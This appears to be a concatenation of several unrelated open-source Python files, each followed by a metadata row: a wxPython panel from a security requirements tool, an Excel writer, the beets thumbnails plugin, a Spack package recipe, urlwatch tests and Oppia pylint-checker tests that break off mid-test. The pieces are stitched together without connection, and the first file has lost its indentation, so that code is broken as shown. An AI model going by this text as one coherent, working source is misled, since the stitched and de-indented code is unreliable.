# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
import armid
from BasePanel import BasePanel
import ConceptReference
from Borg import Borg
class ConceptReferencePanel(BasePanel):
def __init__(self,parent):
BasePanel.__init__(self,parent,armid.CONCEPTREFERENCE_ID)
self.theId = None
b = Borg()
self.dbProxy = b.dbProxy
def buildControls(self,isCreate,isUpdateable=True):
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(self.buildTextSizer('Name',(87,30),armid.CONCEPTREFERENCE_TEXTNAME_ID),0,wx.EXPAND)
dims = ['asset','attacker','countermeasure','domainproperty','environment','goal','misusecase','obstacle','persona','requirement','response','risk','role','task','threat','vulnerability']
mainSizer.Add(self.buildComboSizerList('Concept',(87,30),armid.CONCEPTREFERENCE_COMBODIMNAME_ID,dims),0,wx.EXPAND)
mainSizer.Add(self.buildComboSizerList('Object',(87,30),armid.CONCEPTREFERENCE_COMBOOBJTNAME_ID,[]),0,wx.EXPAND)
mainSizer.Add(self.buildMLTextSizer('Description',(87,30),armid.CONCEPTREFERENCE_TEXTDESCRIPTION_ID),1,wx.EXPAND)
mainSizer.Add(self.buildCommitButtonSizer(armid.CONCEPTREFERENCE_BUTTONCOMMIT_ID,isCreate),0,wx.CENTER)
wx.EVT_COMBOBOX(self,armid.CONCEPTREFERENCE_COMBODIMNAME_ID,self.onDimensionChange)
self.SetSizer(mainSizer)
def loadControls(self,objt,isReadOnly=False):
self.theId = objt.id()
nameCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_TEXTNAME_ID)
dimCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_COMBODIMNAME_ID)
objtCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_COMBOOBJTNAME_ID)
descCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_TEXTDESCRIPTION_ID)
nameCtrl.SetValue(objt.name())
dimCtrl.SetValue(objt.dimension())
objtCtrl.SetValue(objt.objectName())
descCtrl.SetValue(objt.description())
def onDimensionChange(self,evt):
dimName = evt.GetString()
objts = self.dbProxy.getDimensionNames(dimName)
objtCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_COMBOOBJTNAME_ID)
objtCtrl.SetItems(objts)
|
apache-2.0
| -7,756,544,276,121,583,000 | 46.133333 | 191 | 0.762023 | false |
EclipseXuLu/DataHouse
|
DataHouse/crawler/file_helper.py
|
1
|
1669
|
import logging
import os
from openpyxl import Workbook
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s \t', level=logging.INFO)
EXCEL_DIR = '/home/lucasx/PycharmProjects/DataHouse/DataSet/'
def write_excel(list_, filename):
mkdirs_if_not_exists(EXCEL_DIR)
wb = Workbook()
ws = wb.active
ws.title = "HouseInfo"
ws.cell(row=1, column=1).value = 'address'
ws.cell(row=1, column=2).value = 'area'
ws.cell(row=1, column=3).value = 'block'
ws.cell(row=1, column=4).value = 'buildYear'
ws.cell(row=1, column=5).value = 'image'
ws.cell(row=1, column=6).value = 'midPrice'
ws.cell(row=1, column=7).value = 'name'
ws.cell(row=1, column=8).value = 'saleNum'
ws.cell(row=1, column=9).value = 'url'
rownum = 2
for each_item in list_:
ws.cell(row=rownum, column=1).value = each_item.address
ws.cell(row=rownum, column=2).value = each_item.area
ws.cell(row=rownum, column=3).value = each_item.block
ws.cell(row=rownum, column=4).value = each_item.buildYear
ws.cell(row=rownum, column=5).value = each_item.image
ws.cell(row=rownum, column=6).value = each_item.midPrice
ws.cell(row=rownum, column=7).value = each_item.name
ws.cell(row=rownum, column=8).value = each_item.saleNum
ws.cell(row=rownum, column=9).value = each_item.url
rownum += 1
wb.save(EXCEL_DIR + filename + '.xlsx')
    logging.info('Excel file generated successfully!')
def mkdirs_if_not_exists(directory_):
"""create a new folder if it does not exist"""
if not os.path.exists(directory_) or not os.path.isdir(directory_):
os.makedirs(directory_)
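# Illustrative usage sketch -- the house objects here are assumptions; any
# objects exposing the attributes referenced in write_excel() would work:
#   class House(object):
#       def __init__(self, **kwargs):
#           self.__dict__.update(kwargs)
#   houses = [House(address='...', area='...', block='...', buildYear='...',
#                   image='...', midPrice='...', name='...', saleNum=0,
#                   url='http://example.com')]
#   write_excel(houses, 'houses_latest')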
|
mit
| -5,800,700,881,441,562,000 | 35.911111 | 91 | 0.646598 | false |
SusannaMaria/beets
|
beetsplug/thumbnails.py
|
1
|
10439
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Bruno Cauet
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Create freedesktop.org-compliant thumbnails for album folders
This plugin is POSIX-only.
Spec: standards.freedesktop.org/thumbnail-spec/latest/index.html
"""
from __future__ import division, absolute_import, print_function
from hashlib import md5
import os
import shutil
from itertools import chain
from pathlib import PurePosixPath
import ctypes
import ctypes.util
from xdg import BaseDirectory
from beets.plugins import BeetsPlugin
from beets.ui import Subcommand, decargs
from beets import util
from beets.util.artresizer import ArtResizer, get_im_version, get_pil_version
import six
BASE_DIR = os.path.join(BaseDirectory.xdg_cache_home, "thumbnails")
NORMAL_DIR = util.bytestring_path(os.path.join(BASE_DIR, "normal"))
LARGE_DIR = util.bytestring_path(os.path.join(BASE_DIR, "large"))
class ThumbnailsPlugin(BeetsPlugin):
def __init__(self):
super(ThumbnailsPlugin, self).__init__()
self.config.add({
'auto': True,
'force': False,
'dolphin': False,
})
self.write_metadata = None
if self.config['auto'] and self._check_local_ok():
self.register_listener('art_set', self.process_album)
def commands(self):
thumbnails_command = Subcommand("thumbnails",
help=u"Create album thumbnails")
thumbnails_command.parser.add_option(
u'-f', u'--force',
dest='force', action='store_true', default=False,
help=u'force regeneration of thumbnails deemed fine (existing & '
u'recent enough)')
thumbnails_command.parser.add_option(
u'--dolphin', dest='dolphin', action='store_true', default=False,
help=u"create Dolphin-compatible thumbnail information (for KDE)")
thumbnails_command.func = self.process_query
return [thumbnails_command]
def process_query(self, lib, opts, args):
self.config.set_args(opts)
if self._check_local_ok():
for album in lib.albums(decargs(args)):
self.process_album(album)
def _check_local_ok(self):
"""Check that's everythings ready:
- local capability to resize images
- thumbnail dirs exist (create them if needed)
- detect whether we'll use PIL or IM
- detect whether we'll use GIO or Python to get URIs
"""
if not ArtResizer.shared.local:
self._log.warning(u"No local image resizing capabilities, "
u"cannot generate thumbnails")
return False
for dir in (NORMAL_DIR, LARGE_DIR):
if not os.path.exists(dir):
os.makedirs(dir)
if get_im_version():
self.write_metadata = write_metadata_im
tool = "IM"
else:
assert get_pil_version() # since we're local
self.write_metadata = write_metadata_pil
tool = "PIL"
self._log.debug(u"using {0} to write metadata", tool)
uri_getter = GioURI()
if not uri_getter.available:
uri_getter = PathlibURI()
self._log.debug(u"using {0.name} to compute URIs", uri_getter)
self.get_uri = uri_getter.uri
return True
def process_album(self, album):
"""Produce thumbnails for the album folder.
"""
self._log.debug(u'generating thumbnail for {0}', album)
if not album.artpath:
self._log.info(u'album {0} has no art', album)
return
if self.config['dolphin']:
self.make_dolphin_cover_thumbnail(album)
size = ArtResizer.shared.get_size(album.artpath)
if not size:
self._log.warning(u'problem getting the picture size for {0}',
album.artpath)
return
wrote = True
if max(size) >= 256:
wrote &= self.make_cover_thumbnail(album, 256, LARGE_DIR)
wrote &= self.make_cover_thumbnail(album, 128, NORMAL_DIR)
if wrote:
self._log.info(u'wrote thumbnail for {0}', album)
else:
self._log.info(u'nothing to do for {0}', album)
def make_cover_thumbnail(self, album, size, target_dir):
"""Make a thumbnail of given size for `album` and put it in
`target_dir`.
"""
target = os.path.join(target_dir, self.thumbnail_file_name(album.path))
if os.path.exists(target) and \
os.stat(target).st_mtime > os.stat(album.artpath).st_mtime:
if self.config['force']:
self._log.debug(u"found a suitable {1}x{1} thumbnail for {0}, "
u"forcing regeneration", album, size)
else:
self._log.debug(u"{1}x{1} thumbnail for {0} exists and is "
u"recent enough", album, size)
return False
resized = ArtResizer.shared.resize(size, album.artpath,
util.syspath(target))
self.add_tags(album, util.syspath(resized))
shutil.move(resized, target)
return True
def thumbnail_file_name(self, path):
"""Compute the thumbnail file name
See https://standards.freedesktop.org/thumbnail-spec/latest/x227.html
"""
uri = self.get_uri(path)
hash = md5(uri.encode('utf-8')).hexdigest()
return util.bytestring_path("{0}.png".format(hash))
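    # Worked example (paths are illustrative, not from a real run): for
    # /home/user/Music/cover.jpg the URI is file:///home/user/Music/cover.jpg
    # and the thumbnail file name is the 32-character md5 hexdigest of that
    # URI followed by '.png', as required by the freedesktop spec.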
def add_tags(self, album, image_path):
"""Write required metadata to the thumbnail
See https://standards.freedesktop.org/thumbnail-spec/latest/x142.html
"""
mtime = os.stat(album.artpath).st_mtime
metadata = {"Thumb::URI": self.get_uri(album.artpath),
"Thumb::MTime": six.text_type(mtime)}
try:
self.write_metadata(image_path, metadata)
except Exception:
self._log.exception(u"could not write metadata to {0}",
util.displayable_path(image_path))
def make_dolphin_cover_thumbnail(self, album):
outfilename = os.path.join(album.path, b".directory")
if os.path.exists(outfilename):
return
artfile = os.path.split(album.artpath)[1]
with open(outfilename, 'w') as f:
f.write('[Desktop Entry]\n')
f.write('Icon=./{0}'.format(artfile.decode('utf-8')))
f.close()
self._log.debug(u"Wrote file {0}", util.displayable_path(outfilename))
def write_metadata_im(file, metadata):
"""Enrich the file metadata with `metadata` dict thanks to IM."""
command = ['convert', file] + \
list(chain.from_iterable(('-set', k, v)
for k, v in metadata.items())) + [file]
util.command_output(command)
return True
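# A hedged sketch of the `convert` invocation the function above builds (file
# name and values are hypothetical):
#   convert cover.png -set Thumb::URI file:///music/cover.jpg \
#           -set Thumb::MTime 1432829481 cover.png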
def write_metadata_pil(file, metadata):
"""Enrich the file metadata with `metadata` dict thanks to PIL."""
from PIL import Image, PngImagePlugin
im = Image.open(file)
meta = PngImagePlugin.PngInfo()
for k, v in metadata.items():
meta.add_text(k, v, 0)
im.save(file, "PNG", pnginfo=meta)
return True
class URIGetter(object):
available = False
name = "Abstract base"
def uri(self, path):
raise NotImplementedError()
class PathlibURI(URIGetter):
available = True
name = "Python Pathlib"
def uri(self, path):
return PurePosixPath(path).as_uri()
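    # A quick sanity check of what as_uri() produces (minimal sketch; the
    # path is hypothetical): PurePosixPath('/music/a b.jpg').as_uri() returns
    # 'file:///music/a%20b.jpg' -- note the percent-encoded space.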
def copy_c_string(c_string):
"""Copy a `ctypes.POINTER(ctypes.c_char)` value into a new Python
string and return it. The old memory is then safe to free.
"""
# This is a pretty dumb way to get a string copy, but it seems to
# work. A more surefire way would be to allocate a ctypes buffer and copy
# the data with `memcpy` or somesuch.
s = ctypes.cast(c_string, ctypes.c_char_p).value
return b'' + s
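# A minimal sketch of the memcpy-style alternative mentioned in the comment
# above (illustrative only, not used by the plugin; assumes the byte length
# is known up front):
def _copy_c_string_memmove(c_string, length):
    buf = ctypes.create_string_buffer(length)
    ctypes.memmove(buf, c_string, length)
    return buf.raw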
class GioURI(URIGetter):
"""Use gio URI function g_file_get_uri. Paths must be utf-8 encoded.
"""
name = "GIO"
def __init__(self):
self.libgio = self.get_library()
self.available = bool(self.libgio)
if self.available:
self.libgio.g_type_init() # for glib < 2.36
            self.libgio.g_file_new_for_path.argtypes = [ctypes.c_char_p]
self.libgio.g_file_new_for_path.restype = ctypes.c_void_p
self.libgio.g_file_get_uri.argtypes = [ctypes.c_void_p]
self.libgio.g_file_get_uri.restype = ctypes.POINTER(ctypes.c_char)
self.libgio.g_object_unref.argtypes = [ctypes.c_void_p]
def get_library(self):
lib_name = ctypes.util.find_library("gio-2")
try:
if not lib_name:
return False
return ctypes.cdll.LoadLibrary(lib_name)
except OSError:
return False
def uri(self, path):
g_file_ptr = self.libgio.g_file_new_for_path(path)
if not g_file_ptr:
raise RuntimeError(u"No gfile pointer received for {0}".format(
util.displayable_path(path)))
try:
uri_ptr = self.libgio.g_file_get_uri(g_file_ptr)
finally:
self.libgio.g_object_unref(g_file_ptr)
if not uri_ptr:
self.libgio.g_free(uri_ptr)
raise RuntimeError(u"No URI received from the gfile pointer for "
u"{0}".format(util.displayable_path(path)))
try:
uri = copy_c_string(uri_ptr)
finally:
self.libgio.g_free(uri_ptr)
try:
return uri.decode(util._fsencoding())
except UnicodeDecodeError:
raise RuntimeError(
"Could not decode filename from GIO: {!r}".format(uri)
)
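# Hedged usage sketch (not part of the original module; the path is
# hypothetical). Prefer GIO's escaping when the library is available and
# fall back to pathlib, mirroring what _check_local_ok() does:
#
#   getter = GioURI()
#   if not getter.available:
#       getter = PathlibURI()
#   print(getter.uri(b"/music/cover.jpg"))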
|
mit
| 7,912,181,659,199,033,000 | 34.506803 | 79 | 0.599387 | false |
iulian787/spack
|
var/spack/repos/builtin/packages/ecp-viz-sdk/package.py
|
2
|
1561
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class EcpVizSdk(BundlePackage):
"""ECP Viz & Analysis SDK"""
homepage = "https://github.com/chuckatkins/ecp-data-viz-sdk"
git = "https://github.com/chuckatkins/ecp-data-viz-sdk.git"
maintainers = ['chuckatkins']
version('1.0', branch='master')
variant('ascent', default=False, description="Enable Ascent")
# variant('catalyst', default=False, description="Enable Catalyst")
variant('paraview', default=False, description="Enable ParaView")
variant('sz', default=False, description="Enable SZ")
variant('vtkm', default=False, description="Enable VTK-m")
variant('zfp', default=False, description="Enable ZFP")
# Outstanding build issues
# variant('visit', default=False, description="Enable VisIt")
# Missing spack package
# variant('cinema', default=False, description="Enable Cinema")
# variant('rover', default=False, description="Enable ROVER")
depends_on('ascent+shared+mpi+fortran+openmp+python+vtkh+dray', when='+ascent')
depends_on('catalyst', when='+catalyst')
depends_on('paraview+shared+mpi+python3+hdf5+kits', when='+paraview')
depends_on('visit', when='+visit')
depends_on('vtk-m+shared+mpi+openmp+rendering', when='+vtkm')
depends_on('sz+shared+fortran+hdf5+python+random_access', when='+sz')
depends_on('zfp', when='+zfp')
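    # Hedged usage note (not part of the package recipe): variants combine on
    # the command line in the usual Spack way, e.g.
    #   spack install ecp-viz-sdk +paraview +vtkm +zfp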
|
lgpl-2.1
| -6,184,281,966,907,562,000 | 39.025641 | 83 | 0.696348 | false |
lechuckcaptain/urlwatch
|
test/test_handler.py
|
1
|
4525
|
import sys
from glob import glob
import pycodestyle
from urlwatch.jobs import UrlJob, JobBase, ShellJob
from urlwatch.storage import UrlsYaml, UrlsTxt
from nose.tools import raises, with_setup
import tempfile
import os
import imp
from lib.urlwatch import storage
from lib.urlwatch.config import BaseConfig
from lib.urlwatch.storage import JsonConfigStorage, YamlConfigStorage, UrlsJson, CacheMiniDBStorage
from lib.urlwatch.main import Urlwatch
def test_required_classattrs_in_subclasses():
for kind, subclass in JobBase.__subclasses__.items():
assert hasattr(subclass, '__kind__')
assert hasattr(subclass, '__required__')
assert hasattr(subclass, '__optional__')
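# Hedged sketch of the contract checked above (illustrative values, not
# urlwatch's real definitions; kept commented out so the registering
# metaclass does not pick up a bogus job kind):
#
#   class DummyJob(JobBase):
#       __kind__ = 'dummy'
#       __required__ = ('name',)
#       __optional__ = ()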
def test_save_load_jobs():
jobs = [
UrlJob(name='news', url='http://news.orf.at/'),
ShellJob(name='list homedir', command='ls ~'),
ShellJob(name='list proc', command='ls /proc'),
]
with tempfile.NamedTemporaryFile() as tmp:
UrlsYaml(tmp.name).save(jobs)
jobs2 = UrlsYaml(tmp.name).load()
os.chmod(tmp.name, 0o777)
jobs3 = UrlsYaml(tmp.name).load_secure()
assert len(jobs2) == len(jobs)
# Assert that the shell jobs have been removed due to secure loading
assert len(jobs3) == 1
def test_load_config_yaml():
config_json = os.path.join(os.path.dirname(__file__), 'data', 'urlwatch.yaml')
if os.path.exists(config_json):
config = YamlConfigStorage(config_json)
assert config is not None
assert config.config is not None
assert config.config == storage.DEFAULT_CONFIG
def test_load_config_json():
config_json = os.path.join(os.path.dirname(__file__), 'data', 'urlwatch.json')
if os.path.exists(config_json):
config = JsonConfigStorage(config_json)
assert config is not None
assert config.config is not None
assert config.config == storage.DEFAULT_CONFIG
def test_load_urls_txt():
urls_txt = os.path.join(os.path.dirname(__file__), 'data', 'urls.txt')
if os.path.exists(urls_txt):
assert len(UrlsTxt(urls_txt).load_secure()) > 0
def test_load_urls_json():
urls_txt = os.path.join(os.path.dirname(__file__), 'data', 'urls.json')
if os.path.exists(urls_txt):
assert len(UrlsJson(urls_txt).load_secure()) > 0
def test_load_urls_yaml():
urls_yaml = 'share/urlwatch/examples/urls.yaml.example'
if os.path.exists(urls_yaml):
assert len(UrlsYaml(urls_yaml).load_secure()) > 0
def test_load_hooks_py():
hooks_py = 'share/urlwatch/examples/hooks.py.example'
if os.path.exists(hooks_py):
imp.load_source('hooks', hooks_py)
def test_pep8_conformance():
"""Test that we conform to PEP-8."""
style = pycodestyle.StyleGuide(ignore=['E501', 'E402'])
py_files = [y for x in os.walk(os.path.abspath('.')) for y in glob(os.path.join(x[0], '*.py'))]
py_files.append(os.path.abspath('urlwatch'))
result = style.check_files(py_files)
assert result.total_errors == 0, "Found #{0} code style errors".format(result.total_errors)
class TestConfig(BaseConfig):
def __init__(self, config, urls, cache, hooks, verbose):
(prefix, bindir) = os.path.split(os.path.dirname(os.path.abspath(sys.argv[0])))
super().__init__('urlwatch', os.path.dirname(__file__), config, urls, cache, hooks, verbose)
def teardown_func():
"tear down test fixtures"
cache = os.path.join(os.path.dirname(__file__), 'data', 'cache.db')
if os.path.exists(cache):
os.remove(cache)
@with_setup(teardown=teardown_func)
def test_run_watcher():
urls = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'share', 'urlwatch', 'examples', 'urls.yaml.example')
config = os.path.join(os.path.dirname(__file__), 'data', 'urlwatch.yaml')
cache = os.path.join(os.path.dirname(__file__), 'data', 'cache.db')
hooks = ''
config_storage = YamlConfigStorage(config)
cache_storage = CacheMiniDBStorage(cache)
urls_storage = UrlsYaml(urls)
urlwatch_config = TestConfig(config, urls, cache, hooks, True)
urlwatcher = Urlwatch(urlwatch_config, config_storage, cache_storage, urls_storage)
urlwatcher.run_jobs()
def test_unserialize_shell_job_without_kind():
job = JobBase.unserialize({
'name': 'hoho',
'command': 'ls',
})
assert isinstance(job, ShellJob)
@raises(ValueError)
def test_unserialize_with_unknown_key():
JobBase.unserialize({
'unknown_key': 123,
'name': 'hoho',
})
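# Companion example (hedged, not an original test): with an explicit 'kind'
# key, unserialize should yield the matching job class -- 'url' is assumed
# here to map to UrlJob.
#
#   job = JobBase.unserialize({'kind': 'url', 'name': 'news',
#                              'url': 'http://news.orf.at/'})
#   assert isinstance(job, UrlJob)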
|
bsd-3-clause
| 80,278,206,530,138,000 | 31.092199 | 121 | 0.661215 | false |
prasanna08/oppia
|
scripts/linters/pylint_extensions_test.py
|
1
|
105003
|
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For details on how to write such tests, please refer to
# https://github.com/oppia/oppia/wiki/Writing-Tests-For-Pylint
"""Unit tests for scripts/pylint_extensions."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import tempfile
import unittest
import python_utils
from . import pylint_extensions
import astroid # isort:skip
from pylint import testutils # isort:skip
from pylint import lint # isort:skip
from pylint import utils # isort:skip
class ExplicitKeywordArgsCheckerTests(unittest.TestCase):
def setUp(self):
super(ExplicitKeywordArgsCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.ExplicitKeywordArgsChecker)
self.checker_test_object.setup_method()
def test_finds_non_explicit_keyword_args(self):
(
func_call_node_one, func_call_node_two, func_call_node_three,
func_call_node_four, func_call_node_five, func_call_node_six,
class_call_node) = astroid.extract_node(
"""
class TestClass():
pass
def test(test_var_one, test_var_two=4, test_var_three=5,
test_var_four="test_checker"):
test_var_five = test_var_two + test_var_three
return test_var_five
def test_1(test_var_one, test_var_one):
pass
def test_2((a, b)):
pass
test(2, 5, test_var_three=6) #@
test(2) #@
test(2, 6, test_var_two=5, test_var_four="test_checker") #@
max(5, 1) #@
test_1(1, 2) #@
test_2((1, 2)) #@
TestClass() #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='non-explicit-keyword-args',
node=func_call_node_one,
args=(
'\'test_var_two\'',
'function',
'test'
)
),
):
self.checker_test_object.checker.visit_call(
func_call_node_one)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
func_call_node_two)
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='non-explicit-keyword-args',
node=func_call_node_three,
args=(
'\'test_var_three\'',
'function',
'test'
)
)
):
self.checker_test_object.checker.visit_call(
func_call_node_three)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(class_call_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(func_call_node_four)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(func_call_node_five)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(func_call_node_six)
def test_finds_arg_name_for_non_keyword_arg(self):
node_arg_name_for_non_keyword_arg = astroid.extract_node(
"""
def test(test_var_one, test_var_two=4, test_var_three=5):
test_var_five = test_var_two + test_var_three
return test_var_five
test(test_var_one=2, test_var_two=5) #@
""")
message = testutils.Message(
msg_id='arg-name-for-non-keyword-arg',
node=node_arg_name_for_non_keyword_arg,
args=('\'test_var_one\'', 'function', 'test'))
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_call(
node_arg_name_for_non_keyword_arg)
def test_correct_use_of_keyword_args(self):
node_with_no_error_message = astroid.extract_node(
"""
def test(test_var_one, test_var_two=4, test_var_three=5):
test_var_five = test_var_two + test_var_three
return test_var_five
test(2, test_var_two=2) #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
node_with_no_error_message)
def test_function_with_args_and_kwargs(self):
node_with_args_and_kwargs = astroid.extract_node(
"""
def test_1(*args, **kwargs):
pass
test_1(first=1, second=2) #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
node_with_args_and_kwargs)
def test_constructor_call_with_keyword_arguments(self):
node_with_no_error_message = astroid.extract_node(
"""
class TestClass():
def __init__(self, first, second):
pass
TestClass(first=1, second=2) #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_call(
node_with_no_error_message)
def test_register(self):
pylinter_instance = lint.PyLinter()
pylint_extensions.register(pylinter_instance)
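# Summary of the behavior exercised above (comments only, grounded in the
# fixtures): passing a value positionally to a defaulted parameter is
# flagged, e.g.
#   test(2, 5, test_var_three=6)    -> non-explicit-keyword-args ('test_var_two')
# while naming every defaulted argument passes:
#   test(2, test_var_two=2)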
class HangingIndentCheckerTests(unittest.TestCase):
def setUp(self):
super(HangingIndentCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.HangingIndentChecker)
self.checker_test_object.setup_method()
def test_no_break_after_hanging_indentation(self):
node_break_after_hanging_indent = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json('/ml/\\trainedclassifierhandler',
self.payload, expect_errors=True, expected_status_int=401)
if (a > 1 and
b > 2):
""")
node_break_after_hanging_indent.file = filename
node_break_after_hanging_indent.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_break_after_hanging_indent))
message = testutils.Message(
msg_id='no-break-after-hanging-indent', line=1)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_break_after_hanging_indentation_with_comment(self):
node_break_after_hanging_indent = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json('/ml/\\trainedclassifierhandler', # pylint: disable=invalid-name
self.payload, expect_errors=True, expected_status_int=401)
if (a > 1 and
b > 2): # pylint: disable=invalid-name
""")
node_break_after_hanging_indent.file = filename
node_break_after_hanging_indent.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_break_after_hanging_indent))
message = testutils.Message(
msg_id='no-break-after-hanging-indent', line=1)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_break_after_hanging_indentation(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""\"\"\"Some multiline
docstring.
\"\"\"
# Load JSON.
master_translation_dict = json.loads(
utils.get_file_contents(os.path.join(
os.getcwd(), 'assets', 'i18n', 'en.json')))
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_hanging_indentation_with_a_comment_after_bracket(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json( # pylint-disable=invalid-name
'(',
self.payload, expect_errors=True, expected_status_int=401)""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_hanging_indentation_with_a_comment_after_two_or_more_bracket(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""self.post_json(func( # pylint-disable=invalid-name
'(',
self.payload, expect_errors=True, expected_status_int=401))""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
class DocstringParameterCheckerTests(unittest.TestCase):
def setUp(self):
super(DocstringParameterCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
def test_no_newline_below_class_docstring(self):
node_no_newline_below_class_docstring = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_no_newline_below_class_docstring.file = filename
node_no_newline_below_class_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_no_newline_below_class_docstring)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_no_newline_below_class_docstring)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_excessive_newline_below_class_docstring(self):
node_excessive_newline_below_class_docstring = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_excessive_newline_below_class_docstring.file = filename
node_excessive_newline_below_class_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_excessive_newline_below_class_docstring)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_excessive_newline_below_class_docstring)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_inline_comment_after_class_docstring(self):
node_inline_comment_after_class_docstring = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(dummy_class):
\"\"\"This is a docstring.\"\"\"
# This is a comment.
def func():
a = 1 + 2
""")
node_inline_comment_after_class_docstring.file = filename
node_inline_comment_after_class_docstring.path = filename
self.checker_test_object.checker.visit_classdef(
node_inline_comment_after_class_docstring)
message = testutils.Message(
msg_id='newline-below-class-docstring',
node=node_inline_comment_after_class_docstring)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_multiline_class_argument_with_incorrect_style(self):
node_multiline_class_argument_with_incorrect_style = (
astroid.scoped_nodes.Module(
name='test',
doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
class ClassName(
dummy_class):
\"\"\"This is a docstring.\"\"\"
a = 1 + 2
""")
node_multiline_class_argument_with_incorrect_style.file = filename
node_multiline_class_argument_with_incorrect_style.path = filename
self.checker_test_object.checker.visit_classdef(
node_multiline_class_argument_with_incorrect_style)
message = testutils.Message(
